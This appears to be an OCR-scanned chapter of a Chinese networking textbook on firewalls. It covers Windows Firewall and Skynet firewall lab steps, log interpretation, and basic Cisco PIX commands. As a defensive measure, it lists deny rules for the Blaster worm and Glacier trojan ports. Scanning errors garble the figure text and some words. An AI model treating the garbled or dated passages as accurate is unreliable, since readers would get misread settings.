有 限 公司 研发 制作 给 个 人 计算 机 使 用 的 网 络 安全 程序 ,是 “中 国 国 家 安全 部 "“ 中 国 公安 
部 ”“ 中 国 国 家 保密 局 ”及 “中 国 国 家 信息 安全 测评 认证 中 心 ”信息 安全 产品 最 新 检验 标准 认 
证 通过 ,并 可 使 用 于 中 国政 府 机 构 和 军事 机 关 及 对 外 发 行销 售 的 个 人 版 防火 墙 软 件 。 

天 网 防火 墙 具 有 以 下 特点 。 

@ 严密 的 实时 监控 。 天 网 防火 墙 对 所 有 来 自 外 部 机 器 的 访问 请 求 进行 过 滤 .发现 非 授 
权 的 访问 请 求 后 立即 拒绝 ,随时 保护 用 户 系统 的 信息 安全 。 

@ 灵活 的 安全 规则 。 天 网 防火 墙 设置 了 一 系列 安全 规则 ,允许 特定 主机 的 相应 服务 ， 
拒绝 其 他 主机 的 访问 要 求 。 用 户 还 可 以 根据 自己 的 实际 情况 .添加 、 删 除 、 修 改 安全 规则 , 保 
护 主 机 安全 。 
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@ 应 用 程序 规则 设置 。 天 网 防火 墙 增加 对 应 用 程序 数据 包 进 行 底层 分 析 拦 截 功 能 , 它 
可 以 控制 应 用 程序 发 送 和 接收 数据 包 的 类 型 .通信 端口 ,并且 决定 拦截 还 是 通过 。 

@ 详细 的 访问 记录 和 完善 的 报警 系统 。 天 网 防火 墙 可 显示 所 有 被 拦截 的 访问 记录 , 包 
括 访问 的 时 间 、 来 源 、 类 型 .代码 等 都 详细 地 记录 下 来 .可 以 清楚 地 看 到 是 否 有 入 侵 者 想 连 接 
到 用 户 的 计算 机 ,从 而 制定 更 有 效 的 防护 规则 。 天 网 防火 墙 还 设置 了 完善 的 声音 报警 系统 ， 
当 出 现 异常 情况 的 时 候 , 系 统 会 发 出 预警 信号 ,从 而 让 用 户 做 好 防御 措施 。 

@ 即时 聊天 保护 功能 。 


74 项 目 实 施 


7.4.1 任务 1: Windows 防火 墙 的 应 用 


1. 任务 目标 


(1) 熟悉 Windows 防火 墙 的 应 用 。 
(2) 理解 防火 墙 的 作用 。 


2. 任务 内 容 


(1) 启用 Windows 防火 墙 。 

(2) 设置 Windows 防火 墙 允许 ping 命令 运行 。 
(3) 设置 Windows 防火 墙 允 许 QQ 程序 运行 。 
(4) 启用 安全 记录 。 

(5) 查看 安全 日 志 。 


3. 完成 任务 所 需 的 设备 和 软件 
装 有 Windows XP/2003 操作 系统 的 PC 1 台 。 
4. 任务 实施 步骤 


(1) 启用 Windows 防火 墙 

步骤 1: 选择 菜单 中 的 “开始 ”一 “设置 >“ 控制 面板 ”命令 ,打开 “控制 面板 ”窗口 ,然后 
双击 其 中 的 “Windows 了 防火墙" 图标, 打开 “Windows 防火 墙 ”对 话 框 ,如 图 7-10 所 示 。 

步骤 2: 在 “常规 ”选项 卡 中 ,选中 “启用 (推荐 )” 单 选 按钮 。 

(2) 设置 Windows 防火 墙 允许 ping 命令 运行 

在 默认 情况 下 , Windows 防火 墙 是 不 允许 ping 命令 运行 的 . 即 当 本 地 计算 机 开启 
Windows 防火 墙 时 .在 网 络 中 的 其 他 计算 机 上 运行 ping 命令 .向 本 地 计算 机 发 送 数 据 包 ， 
本 地 计算 机 将 不 会 应 答 , 其 他 计算 机 上 会 出 现 ping 命令 的 超时 错误 。 如 果 要 让 Windows 
防火 墙 允许 ping 命令 运行 , 需 进 行 如 下 设置 。 
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图 7-10 “Windows 防火 墙 ”对 话 框 


步骤 1: 在 “Windows 防火 墙 " 对 话 框 中 ,选择 “高 级 "选项 卡 ,如 图 7-11 所 示 。 
步骤 2: 单 击 ICMP 选项 组 中 的 “设置 ”按钮 ,打开 “ICMP 设置 "对话 框 ,选中 “允许 传人 
回 显 请 求 " 复 选 框 ,如 图 7-12 所 示 , 再 单 击 “ 确 定 ” 按 钮 。 


下 Windows 防火 洲 


En EE i 4 
网 阁 连 接 设 置 
下 接 | Windows 防火 墙 。 要 为 每 个 连接 单独 过 加 例 
rs < 
站 


| 并 四 口 区 冯 伟 入 请“ 
口 允 许 传 入 路 由 器 请 求 
口 允 许 传 出 不 可 达 目 标 
安全 日 志 记 录 口 允许 传 出 源 抑制 

您 可 以 他 梁 用 于 并 难 解答 的 日 志文 件 。 Ce 口 区 许 传 出 参数 问题 


口 允许 传 出 时 间 超时 


口 允 许 重 定向 


ED 十 
ws ee 


Pr rT 全 


图 7-11 “高 级 ”选项 卡 图 7-12 “ICMP 设置 ?对 话 框 


(3) 设置 Windows 防火 墙 允许 QQ 程序 运行 

在 默认 情况 下 .Windows 防火 墙 将 阻止 QQ 程序 的 运行 ,如 果 要 让 Windows 防火 墙 允 
许 QQ 程序 运行 . 需 进 行 如 下 设置 。 

步骤 1: 在 “Windows 防火 墙 " 对 话 框 中 .选择 “例外 ”选项 卡 ,如 图 7-13 所 示 ,“ 程 序 和 服 
务 ” 列 表 框 中 列 出 了 Windows 防火 墙 允许 进行 传人 网 络 连接 的 程序 和 服务 。 

步骤 2: 单 击 “添加 程序 ”按钮 ,打开 “添加 程序 ”对 话 框 .向 下 拖 动 垂直 深 动 条 .找到 并 选 
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中 “腾讯 QQ” 程 序 ,如 图 7-14 所 示 . 再 单 击 “ 确 定 ” 按 钮 。 此 时 ,“ 腾 讯 QQ” 程 序 已 填 和 人 “ 例 
外 ”选项 卡 中 的 “程序 和 服务 ”列表 框 中 了 。 


EL 


idovs 防火 下 列 肽 定 程 序 和 腿 务 之 外 的 传 入 网 六 连接 。 添 
和 后 划 此 芝 下 守 才 本人 多 


程序 和 服务 E) 
E33 
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加 Windows 防火 墙 阻止 程序 时 通知 我 0D 


图 7-13 “例外 ”选项 卡 图 7-14 “添加 程序 ”对话 框 


(4) 启用 安全 记录 

当 Windows 防火 墙 处 于 启动 状态 时 ,在 默认 情况 下 并 不 启用 安全 记录 。 但 是 ,无 论 安 
全 记录 是 否 被 启用 ,防火 墙 都 能 正常 工作 ,而 只 有 启用 了 Windows 防火 墙 的 网 络 连接 (如 启 
用 如 图 7-11 所 示 对 话 框 中 的 “本 地 连接 ”) 才 能 使 用 日 志 记 录 功 能 。 

步骤 1: 在 “Windows 防火 墙 "对 话 框 中 ,选择 * 高 级 "选项 卡 。 

步骤 2: 单 击 * 安 全 日 志 记录 ”选项 组 中 的 * 设 置 "按钮 ， 
打开 * 日 志 设 置 "对 话 框 ,选中 * 记 录 被 丢弃 的 数据 包 " 和 * 记 
录 成 功 的 连接 ” 复 选 框 ,如 图 7-15 所 示 ,再 单 击 “ 确 定 ” 按 钮 。 

(5) 查看 安全 日 志 

防火 墙 安全 日 志文 件 名 为 pfirewall log, 存放 在 ”| E33 史 
C:\Windows 文件 夹 中 。 但 必须 选中 “日 志 设置 "对 话 框 中 | [一生 
的 “记录 被 丢弃 的 数据 包 ”或 “记录 成 功 的 连接 " 复 选 框 后 ， 
才能 使 pfirewall. log 文件 出 现在 C:\Windows 文件 夹 中 。 

步骤 1: 在 “Windows 防火 墙 " 对 话 框 中 , 单 击 “ 确 定 ” 按 。 图 ”15 “日 志 设 置 "对 话 框 
钮 关闭 对 话 框 ,然后 重新 打开 “Windows 防火 墙 "对 话 框 , 先 
择 “ 高 级 ”选项 卡 。 

步骤 2: 单 击 “ 安 全 日 志 记录 ”选项 组 中 的 “设置 "按钮 ,打开 “日 志 设置 "对 话 框 。 

步骤 3: 单 击 “ 另 存 为 "按钮 ,在 打开 的 “另存 为 ”对话 框 中 ,找到 并 右 击 pfirewall. log 文 
件 , 在 弹出 的 快捷 菜单 中 选择 “打开 ”命令 , 即 可 查看 安全 日 志 。 

说 明 : 如 果 超 过 了 pfirewall. log 可 允许 的 最 大 大 小 (4096 KB), 则 日 志文 件 中 原 有 的 信 
息 将 转移 到 一 个 新 文件 中 ,并 用 文件 名 pfirewall. log. old 进行 保存 。 新 的 信息 将 保存 在 
pfirewall. log 文件 中 。 
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7.4.2 任务 2: 天 网 防火 墙 的 配置 


1. 任务 目标 


(1) 了 解 天 网 防火 墙 的 功能 。 
(2) 熟悉 天 网 防火 墙 的 配置 。 


2. 任务 内 容 


(1) 天 网 防火 墙 的 默认 设置 。 

(2) Internet Explorer 程序 规则 设置 。 
(3) 开放 BT 端口 。 

(4) 禁止 端口 防范 常见 病毒 。 

(5) 开放 Web 和 FTP 服务 。 

(6) 日 志 分 析 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP 操作 系统 的 PC 1 台 。 

(2) 天 网 防火 墙 (个 人 版 ) 软 件 1 套 。 

(3) 能 正常 运行 的 局 域 网 。 

4. 任务 实施 步骤 

(1) 天 网 防火 墙 的 默认 设置 

步骤 1: 下 载 并 安装 天 网 防火 墙 ( 个 人 版 ) 后 的 主 界面 如 图 7-16 所 示 , 安 全 级 别 默认 为 
“中 ”, 能 满足 大 部 分 用 户 的 需要 。 操 作 按 钮 主要 有 “应 用 程序 规则 ”、“IP 规则 管理 "“ 系 统 
设置 "“ 网 络 使 用 情况 ”“ 日 志 ”*、“ 接 通 / 断 开 网 络 开 关 ” 等 。 

应 用 程序 规则 ”系统 设置 。 日 志 


天 防火 堵 个 人 版 


IP 规 则 管理 网 络 使 用 情况 接 通 / 断 开 网 络 开关 
图 7-16 天 网 防火 墙 主 界面 


步骤 2: 单 击 “ 系 统 设置 "按钮 .打开 如 图 7-17 所 示 的 界面 ,选中 “开机 后 自动 启动 防火 
墙 " 和 “报警 声音 " 复 选 框 ,取消 选择 “自动 弹出 新 资讯 提示 " 复 选 框 。 
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图 7-17 “系统 设置 "界面 


如 果 没 有 特殊 要 求 ( 如 开放 某 些 端口 或 屏蔽 某 些 端口 或 某 些 IP 操作 等 ) ,天 网 防火 墙 默 
认 设 置 下 就 能 起 到 防火 墙 的 强大 作用 。 但 是 防火 墙 的 苛刻 要 求 给 某 些 程序 的 使 用 带 来 
膝 烦 。 

(2) Internet Explorer 程序 规则 设置 

天 网 防火 墙 对 应 用 程序 数据 传输 包 具 有 底层 分 析 拦 截 功能 , 它 可 以 控制 应 用 程序 发 送 
和 接收 数据 传输 包 的 类 型 .通信 端口 ,并 且 决 定 拦截 还 是 通过 。 

步骤 1: 在 Internet Explorer 浏览 器 地 址 栏 中 任意 输入 某 一 网 址 ,如 输入 ww. baidu 
. com, 然 后 按 Enter 键 ,开始 传输 数据 包 。 

步骤 2: 传输 的 数据 包 被 天 网 防火 墙 截获 分 析 , 并 弹出 窗口 ,询问 是 通过 还 是 禁止 ,如 
图 7-18 所 示 。 

步骤 3: 选中 “该 程序 以 后 都 按照 这 次 的 操作 运行 " 复 选 框 ,再 单 击 “ 允 许 ” 按 钮 ,允许 访 
间 网 络 。 

如 果 取 消 选择 “该 程序 以 后 都 按照 这 次 的 操作 运行 ” 复 选 框 ,那么 天 网 防火 墙 在 以 后 会 
继续 截获 该 应 用 程序 的 数据 传输 数据 包 ,并且 弹出 警告 窗口 。 

步骤 4: 单 击 天 网 防火 墙 主 界面 中 的 “应 用 程序 规则 ”按钮 ,可 见 Internet Explorer 程序 
已 填 入 “应 用 程序 规则 ”列表 中 了 ,如 图 7-19 所 示 。 

步骤 5: 在 图 7-19 中 , 单 击 Internet Explorer 程序 规则 右 侧 的 “选项 ”按钮 ,打开 “应 用 
程序 规则 高 级 设置 "对话 框 ,如 图 7-20 所 示 。 选 中 “通过 TCP 协议 发 送信 息 ” 和 “通过 UDP 
协议 发 送信 息 ” 复 选 框 ,取消 选择 “提供 TCP 协议 服务 ”和 “提供 UDP 协议 服务 ” 复 选 框 , 选 
中 “端口 范围 ” 单 选 按钮 ,并 设置 端口 范围 为 “从 80 到 80”, 再 选中 “询问 " 单 选 按 钮 ,最 后 单 
击 “ 确 定 ” 按 钮 。 
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图 7-19 “应 用 程序 规则 ”界面 


图 7-20 “应 用 程序 规则 高 级 设置 "对 话 框 


“通过 TCP 协议 发 送信 息 ” 和 “通过 UDP 协议 发 送信 息 ” 是 指 此 应 用 程序 进程 可 以 向 外 
发 出 连接 请 求 , 通 常用 于 各 种 客户 端 软件 ;* 提 供 TCP 协议 服务 ”和 “提供 UDP 协议 服务 "是 
指 此 程序 可 以 在 本 机 打开 监听 的 端口 来 提供 网 络 服 务 , 这 通常 用 于 各 种 服务 器 端 程序 中 。 

步骤 6: 单 击 图 7-19 中 的 “增加 规则 ”按钮 加 ,可 添加 新 的 应 用 程序 规则 。 单 击 “ 刷 新 列 
表 ” 按 钮 图 ,再 单 击 “ 是 ”按钮 ,可 检查 已 经 失效 的 应 用 程序 规则 ,然后 弹出 处 理 结果 。 单 击 
“导入 规则 ”按钮 轿 “ 导 出 规则 ”按钮 国 , 可 导入 、 导 出 已 预 设 和 已 保存 的 规则 。 如 需要 删除 
全 部 应 用 程序 规则 ,可 单 击 “ 清 空 所 有 规则 ”按钮 国 , 删 除 全 部 应 用 程序 规则 。 

(3) 开放 BT 端口 

IP 规则 是 针对 整个 系统 的 网 络 层 数据 包 监 控 而 设置 的 。 天 网 防火 墙 已 经 默认 设置 了 
相当 好 的 默认 规则 ,一 般 用 户 并 不 需要 做 任何 IP 规则 修改 ,就 可 以 直接 使 用 。 利 用 自 定义 
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IP 规则, 用户 可 针对 个 人 不 同 的 网 络 状态 .设置 自己 的 IP 安全 规则 ,使 防御 手段 更 周到 、 更 
实用 。 

如 果 想 开放 某 些 端口 就 需要 新 建 IP 规则 。BT 软件 使 用 的 端口 为 6881 一 6889 这 9 个 
端口 ,而 防火 墙 的 默认 设置 是 不 允许 访问 这 些 端口 的 , 它 只 允许 BT 软件 访问 网 络 , 所 以 有 
时 在 一 定 程度 上 影响 了 BT 的 下 载 速 度 。 当 然 ,如 果 关 闭 防火 墙 就 没什么 影响 了 ,但 机 器 就 
相对 不 安全 了 。 下 面 以 开放 6881 一 6889 端口 为 例 . 介 绍 如 何 设置 开放 端口 。 

步骤 1: 在 图 7-16 中 , 单 击 “IP 规则 管理 ”按钮 (此 时 ,安全 级 别 自动 改 为 “ 自 定义 ”) ,再 
单 击 * 增 加 规则 ?按钮 到 .如 图 7-21 所 示 。 

步骤 2: 在 打开 的 “增加 IP 规则 ?对 话 框 中 ,输入 名 称 为 "BT” ,数据 包 方向 为 “接收 或 发 
送 ”, 对 方 IP 地 址 为 “任何 地 址 ”, 由 于 BT 使 用 的 是 TCP 协议 ,所 以 选择 数据 包 协 议 类 型 为 
“TCP”, 本 地 端口 为 “从 6881 到 6889”, 对 方 端口 为 "从 0 到 0”( 即 不 指定 端口 ), 选 中 所 有 
TCP 标志 位 (FIN .SYN、RST、ACK .PSH .URG) 复 选 框 ,在 “ 当 满 足 上 述 条 件 时 ”选项 组 中 ， 
在 列表 框 中 选择 “通行 "选项 ,并 选中 “记录 " 复 选 框 ,如 图 7-22 所 示 ,再 单 击 “ 确 定 "按钮 。 此 
时 ,名 称 为 “BT” 的 IP 规则 已 填 人 IP 规则 列表 中 。 


图 7-21 “IP 规则 管理 ?界面 图 7-22 “增加 IP 规则 ”对 话 框 


步骤 3: 选中 新 建立 的 BT 规则 ,多 次 单 击 “ 规 则 向 上 移 ” 按 钮 国 , 直 至 把 BT 规则 上 移 到 
TCP 协议 组 的 顶端 ,然后 单 击 “ 保 存 规则 ”按钮 圆 .如 图 7-23 所 示 。 
(4) 禁止 端口 防范 常见 病毒 
@ 防范 * 冲 击 波 "病毒 .“ 冲 击 波 ” 病 毒 是 利用 Windows 系统 的 RPC 服务 漏洞 以 及 开 
放 的 69、135、139、445 、4444 端口 进行 人 侵 。 禁 止 上 述 端口 ,就 可 防范 “冲击波 ?病毒 。 
步骤 1: 在 图 7-23 中 ,选中 * 禁 止 互联 网 上 的 机 器 使 用 我 的 共享 资源 ” 复 选 框 ,就 禁止 了 
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图 7-23 将 BT 规则 上 移 到 TCP 协议 组 的 顶端 


135 和 139 两 个 端口 。 
步骤 2: 新 建 “ 禁 止 69 端口 "禁止 445 端口 "和 “禁止 4444 端口 "3 条 规则 ,如 图 7-24 一 
图 7-26 所 示 。 


图 7-24 “禁止 69 端口 ?规则 图 7-25 “禁止 445 端口 "规则 
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图 7-26 “禁止 4444 端口 "规则 


步骤 3: 上 述 3 条 规则 建立 完成 后 , 单 击 * 保 存 规则 ”按钮 图 ,保存 完 后 就 可 以 防范 ”冲击 
波 ” 病 毒 了 。 

@ 防范 “冰河 ”木马 。“ 冰 河 ” 木 马 使 用 的 是 UDP 协议 ,默认 端口 为 7626, 只 要 禁止 这 
个 端口 ,就 可 防范 “冰河 ”木马 。 

步骤 1: 新 建 “禁止 冰河 木马 ”规则 ,如 图 7-27 所 示 。 

步骤 2: 规则 建立 完成 后 , 单 击 “ 保 存 规 则 ”按钮 图 ,保存 完 后 就 可 以 防范 “冰河 "木马 了 。 

如 果 掌 握 一 些 病 毒 的 攻击 特性 及 其 使 用 的 端口 ,就 可 以 参照 上 面 的 方法 设置 ,可 以 防范 
病毒 和 木马 的 攻击 。 

(5) 开放 Web 和 FTP 服务 

防火 墙 不 仅 能 限制 本 机 访问 外 部 的 服务 器 ,也 能 限制 外 部 计算 机 访问 本 机 。 要 使 Web 
和 FTP 服务 器 能 正常 使 用 ,必须 设置 相应 的 防火 墙 规则 。 

步骤 1: 在 图 7-21 中 ,取消 选择 “禁止 所 有 人 连接 " 复 选 框 。 

步骤 2: 新 建 < 开 放 Web 端口 "和 “开放 FTP 端口 "两 条 规则 ,如 图 7-28 和 图 7-29 所 示 。 

步骤 3: 上 述 两 条 规则 建立 完成 后 , 单 击 “ 保 存 规 则 ”按钮 加 ,保存 完 后 就 可 以 正常 访问 
Web 和 FTP 服务 器 了 。 

(6) 日 志 分 析 

使 用 防火 墙 .关键 是 会 看 日 志 . 看 懂 日 志 对 分 析 问 题 是 非常 关键 的 。 日 志 记 录 了 不 符合 
规则 的 数据 包 被 拦截 的 情况 等 ,通过 分 析 日 志 就 能 知道 计算 机 遭受 到 什么 攻击 。 
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项 目 7 防火 墙 技术 
步骤 1: 在 天 网 防火 墙 主 界面 中 , 单 击 “ 日 志 ” 按 钮 ,打开 日 志 界 面 ,选择 日 志 类 型 为 “全 
部 日 志 ”, 如 图 7-30 所 示 。 


图 7-30 日 志 界 面 


每 条 日 志 一 般 分 为 3 行 。 第 一 行 反映 了 数据 包 的 发 送 时 间接 收 时间 , 发 送 者 了 P 地 址 、 对 
方 通信 端口 .数据 包 类 型 .本 机 通信 端口 等 信息 ;第 二 行 是 TCP 数据 包 的 标志 位 ,共有 六 位 标 
志 位 ,分 别 是 :URG( 紧 急 )、ACK( 确 认 )、PSH( 急 迫 )、RST( 复 位 )、.SYN( 同 步 )、FIN( 终 止 ) ,在 
日 志 上 显示 时 只 标 出 第 一 个 字母 ;第 三 行 是 对 数据 包 的 处 理 方法 ,对 于 不 符合 规则 的 数据 包 会 
被 拦截 或 拒绝 ,对 符合 规则 的 但 被 设置 为 监视 的 数据 包 则 会 显示 “继续 下 一 规则 ”。 
步骤 2: 分 析 典 型 日 志 。 下 面 是 一 些 常见 典型 日 志 记 录 。 
。 记录 1:[22:30:56] 202. 121. 0. 112 尝试 用 ping 来 探测 本 机 ， 
TCP 标志 :S， 
该 操作 被 拒绝 。 
解释 :该 记录 显示 了 在 22 时 30 分 56 秒 时 ,IP 地 址 为 202. 121. 0. 112 的 机 器 向 用 户 的 
计算 机 发 出 ping 命令 来 探测 主机 信息 ,但 被 拒绝 了 。 
人 们 常用 ping 命令 来 确定 一 个 合法 IP 是 否 存在 。 当 别人 用 ping 命令 来 探测 自己 的 
机 器 时 ,如 果 自 己 的 计算 机 中 安装 了 TCP/IP 协议 ,就 会 返回 一 个 回应 ICMP 包 。 但 如 果 在 
防火 墙 规 则 界面 选中 了 “防止 别人 用 ping 命令 探测 主机 ” 复 选 框 ,就 不 会 返回 给 对 方 这 种 
ICMP 包 , 这 样 别人 就 无 法 用 ping 命令 来 探测 自己 的 计算 机 ,也 就 以 为 该 计算 机 不 存在 。 
如 果 偶 尔 出 现 一 两 条 这 样 的 记录 并 不 奇怪 ,但 如 果 在 日 志 里 显示 有 很 多 条 来 自 同 一 IP 地 址 
的 这 样 的 记录 ,那么 就 很 有 可 能 是 别人 在 用 黑客 工具 探测 你 的 主机 信息 。 
。 记录 2:[5:29:11] 61. 114. 155. 11 试图 连接 本 机 的 http80 端口 ， 
TCP 标志 :S， 
该 操作 被 拒绝 。 
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解释 :本 机 的 http80 端口 是 HTTP 协议 的 端口 ,主要 是 用 来 进行 HTTP 协议 数据 交 
换 , 比 如 网 页 浏览 ,提供 Web 服务 等 。 对 于 服务 器 ,该 记录 表示 有 人 通过 此 端口 访问 服务 器 
的 网 页 ,而 对 于 个 人 用 户 一 般 没 有 这 项 服务 ,如果 在 日 志 里 见 到 大 量 来 自 不同 IP 和 端口 号 
的 此 类 记录 ,而 TCP 标志 都 为 S( 即 连接 请 求 ), 则 很 可 能 是 受到 SYN 泛 洪 攻击 了 。 另 外 ， 
例如 “红色 代码 ”类 的 病毒 ,主要 是 攻击 服务 器 ,感染 这 种 病毒 时 也 会 出 现 上 面 的 情况 。 
。 记录 3:[5:49:55] 31. 14.78. 110 试图 连接 本 机 的 冰河 木马 7626 端口 ， 
TCP 标志 :S， 
该 操作 被 拒绝 。 
解释 :这 是 条 令 人 害怕 的 记录 ,假如 没有 中 冰河 木马 :也 就 没有 打开 7626 端口 ,当然 没 
什么 事 。 但 是 如 果 已 中 了 冰河 木马 ,该 木马 程序 会 自动 打开 7626 端口 ,黑客 就 会 人 侵 并 控 
制 你 的 计算 机 。 当 安装 了 防火 墙 并 禁止 7626 端口 以 后 ,即使 中 了 冰河 木马 ,该 木马 的 有 关 
操作 也 会 被 禁止 。 对 于 常见 的 木马 ,防火墙 会 给 出 相应 的 木马 名 称 , 而 对 于 不 常见 的 木马 ， 
天 网 防火 墙 只 会 给 出 连接 端口 号 ,这 时 就 得 依赖 自己 的 经 验 和 查找 有 关 资 料 来 分 析 该 端口 
是 和 哪 种 木马 程序 相关 联 的 ,从 而 判断 对 方 的 企图 并 采取 相应 措施 ,禁止 那个 端口 。 
。 记录 4:[6:12:33] 接收 到 228. 121. 22. 55 的 IGMP 数据 包 ， 
该 包 被 拦截 。 
解释 :这 是 日 志 中 最 常见 的 也 是 最 普遍 的 攻击 形式 。IGMP(Internet Group Management 
Protocol) 是 用 于 组 播 的 一 种 协议 ,对 于 Windows 用 户 是 没什么 用 途 的 ,但 由 于 Windows 中 
存在 IGMP 漏洞 , 当 向 安装 有 Windows 操作 系统 的 计算 机 发 送 长 度 和 数量 较 大 的 IGMP 
数据 包 时 ,会 导致 系统 TCP/IP 协议 崩溃 ,系统 直接 蓝屏 或 死机 ,这 就 是 所 谓 的 IGMP 攻击 。 
在 日 志 中 表现 为 大 量 来 自 同一 IP 的 IGMP 数据 包 。 一 般 在 自 定义 IP 规则 里 已 经 设 定 了 该 
规则 ,只 要 选中 就 可 以 了 。 
。 记录 5:[6:14:20] 192. 168. 0. 110 的 1294 端口 停止 对 本 机 发 送 数 据 包 ， 
TCP 标志 :FA， 
继续 下 一 规则 。 
。 记录 6:[6:14:20] 本 机 应 答 192. 168. 0. 110 的 1294 端口 ， 
TCP 标志 : A， 
继续 下 一 规则 。 
解释 :从 上 面 两 条 记录 可 知 ,发 送 数据 包 的 计算 机 是 局 域 网 中 的 计算 机 ,而 且 本 机 也 做 
出 了 应 答 , 这 说 明 这 两 条 数据 的 传输 是 符合 规则 的 。 之 所 以 存在 这 两 条 记录 ,是 因为 在 防火 
墙 规 则 设置 界面 中 选中 了 “记录 ” 复 选 框 ,这 样 通过 TCP 传输 的 数据 包 都 会 被 记录 下 来 ,所 
以 不 要 以 为 有 新 的 记录 就 是 遭 到 了 攻击 ,这样 的 日 志 是 正常 的 。 
防火 墙 的 日 志 内 容 远 不 止 上 面 几 种 ,如 果 碰 到 一 些 不 正常 的 连接 ,可 以 查阅 手头 资料 和 网 
上 资料 来 寻找 问题 ,或 上 防火 墙 主页 上 看 看 .这 有 助 于 改进 防火 墙 规则 的 设置 ,使 上 网 更 安全 。 


75 拓展 提高 : Cisco PX 防火 墙 配置 


任何 企业 安全 策略 的 一 个 主要 部 分 都 是 实现 和 维护 防火 墙 ,因此 防火 墙 在 网 络 安全 
的 实现 当中 扮演 着 重要 的 角色 。 防 火 墙 通常 位 于 企业 网 络 的 边缘 ,这 使 得 内 部 网 络 与 
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Internet 之 间或 者 与 其 他 外 部 网 络 互 相隔 离 , 并 限制 网 络 互 访 从 而 保护 企业 内 部 网 络 。 
设置 防火 墙 目 的 都 是 为 了 在 内 部 网 与 外 部 网 之 间 设 立 唯一 的 通道 ,简化 网 络 的 安全 
管理 。 

在 众多 的 企业 级 主流 防火 墙 中 ,Cisco PIX 防火 墙 是 所 有 同类 产品 性 能 最 好 的 一 种 。 
Cisco PIX 系列 防火 墙 主 要 有 5 种 型 号 :PIX506、PIX 515、PIX 520、PIX 525 和 PIX 535。 其 
中 PIX535 是 PIX 500 系列 中 最 新 .功能 最 强 的 一 款 。 它 可 以 提供 运营 商 级 别 的 处 理 能 力 ， 
适用 于 大 型 的 ISP 等 服务 提供 商 。 但 是 PIX 特有 的 OS 操作 系统 ,使 得 大 多 数 管理 是 通过 
命令 行 来 实现 的 ,不 像 其 他 同类 的 防火 墙 通过 Web 管理 界面 来 进行 网 络 管理 ,这 样 会 给 初 
学 者 带 来 不 便 。 以 下 将 通过 实例 介绍 如 何 配置 Cisco PIX 防火 墙 。 

在 配置 PIX 防火 墙 之 前 , 先 来 介绍 一 下 防火 墙 的 物理 特性 。 防 火 墙 通常 具有 至 少 3 个 
接口 ,但 许多 早期 的 防火 墙 只 具有 2 个 接口 ; 当 使 用 具有 3 个 接口 的 防火 墙 时 ,就 至 少 产生 
了 3 个 网 络 , 描 述 如 下 。 

@ 内 部 区 域 ( 内 网 )。 内 部 区 域 通常 就 是 指 企业 内 部 网 络 或 者 是 企业 内 部 网 络 的 一 部 
分 。 它 是 互连网 络 的 信任 区 域 , 即 受到 了 防火 墙 的 保护 。 

@ 外 部 区 域 ( 外 网 )。 外 部 区 域 通常 指 Internet 或 者 非 企 业内 部 网 络 。 它 是 互连网 络 
中 不 被 信任 的 区 域 , 当 外 部 区 域 想 要 访问 内 部 区 域 的 主机 和 服务 ,通过 防火 墙 ,就 可 以 实现 
有 限制 的 访问 。 

@ 非 军 事 区 (DMZ)。DMZ 是 一 个 隔离 的 网 络 ,或 几 个 网 络 。 位 于 DMZ 中 的 主机 或 
服务 器 被 称 为 堡 又 主机。 一般 在 DMZ 内 可 以 放置 Web 服务 器 、E-mail 服务 器 等 。DMZ 
对 于 外 部 用 户 通 常 是 可 以 访问 的 ,这 种 方式 让 外 部 用 户 可 以 访问 企业 的 公开 信息 ,但 却 不 多 
许 他 们 访问 企业 内 部 网 络 。 

注意 : 2 个 接口 的 防火 墙 是 没有 DMZ 的 。 

由 于 PIX535 在 企业 级 别 不 具有 普遍 性 ,因此 下 面 主要 说 明 PIX525 在 企业 网 络 中 的 
应 用 。 
PIX 防火 墙 提供 4 种 管理 访问 模式 。 
非特 权 模 式 。PIX 防火 墙 开 机 自 检 后 ,就 是 处 于 这 种 模式 。 系 统 显 示 为 
pixfirewall> 。 

Q@ 特权 模式 。 输 入 enable 命令 进入 特权 模式 ,可 以 改变 当前 配置 。 显 示 为 
pixfirewall# 。 

@ 配置 模式 。 输 入 configure terminal 命令 进入 此 模式 , 绝 大 部 分 的 系统 配置 都 在 这 
里 进行 。 显 示 为 pixfirewall(config) # 。 

@ 监视 模式 。PIX 防火 墙 在 开机 或 重启 过 程 中 , 按 住 Esc 键 进 入 监视 模式 。 这 时 可 以 
更 新 操作 系统 映像 和 口令 恢复。 显示 为 monitor 二 。 

配置 PIX 防火 墙 有 6 个 基本 命令 :nameif,interface,ip address, nat, global, route。 这 
些 命令 在 配置 PIX 时 是 必需 的 。 以 下 是 配置 的 基本 步骤 。 


1. 配置 防火 墙 接口 的 名 字 . 并 指定 安全 级 别 (nameif) 


Pix525>enable 
Pix525# config terminal 
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Pix525(config) # nameif ethernet0 outside security0 
Pix525(config) # nameif ethernetl inside security100 
Pix525(config) # nameif dmz security50 


提示 :在 默认 配置 中 ,ethernet0 被 命名 为 外 部 接口 (outside) ,安全 级 别 是 0;ethernetl 
被 命名 为 内 部 接口 (inside) ,安全 级 别 是 100。 安 全 级 别 取 值 范围 为 0 一 100, 数 字 越 大 安全 
级 别 越 高 。 


2. 配置 以 太 接口 参数 Cinterface) 


Pix525(config) # interface ethernet0 auto ;auto 表示 自 适应 网 卡 类 型 
Pix525(config) # interface ethernetl 100full ;100full 表示 100Mbps 全 双 工 
Pix525(config) # interface ethernet2 auto 


3. 配置 内 外 网 卡 的 IP 地 址 (ip address) 


Pix525(config) # ip address outside 61.144. 51. 42 255.255.255.248 
Pix525(config) # ip address inside 192.168.0.1 255.255.255.0 


很 明显 ,Pix525 防火 墙 的 外 网 全 地 址 是 61. 144. 51. 42, 内 网 IP 地 址 是 192. 168. 0. 1 。 
4. 指定 要 进行 转换 的 内 部 地 址 Cnat) 


网 络 地 址 翻译 Cnat) 的 作用 是 将 内 网 的 私有 IP 地 址 转换 为 外 网 的 公有 IP 地 址 。nat 命 
令 总 是 与 global 命令 一 起 使 用 ,这 是 因为 nat 命令 可 以 指定 一 台 主 机 或 一 段 范围 的 主机 访 
问 外 网 ,访问 外 网 时 需要 利用 global 所 指定 的 地 址 池 进 行 对 外 访问 。 

nat 命令 配置 语法 : 

nat (if_name) nat_id local_ip [netmark] 

其 中 (if_name) 表 示 内 网 接口 名 字 . 例 如 inside;nat_id 用 来 标识 全 局 地 址 池 , 使 它 与 其 
相应 的 global 命令 相 匹 配 ;local_ip 表示 内 网 被 分 配 的 IP 地址 ,例如 0.0.0.0 表示 内 网 所 有 
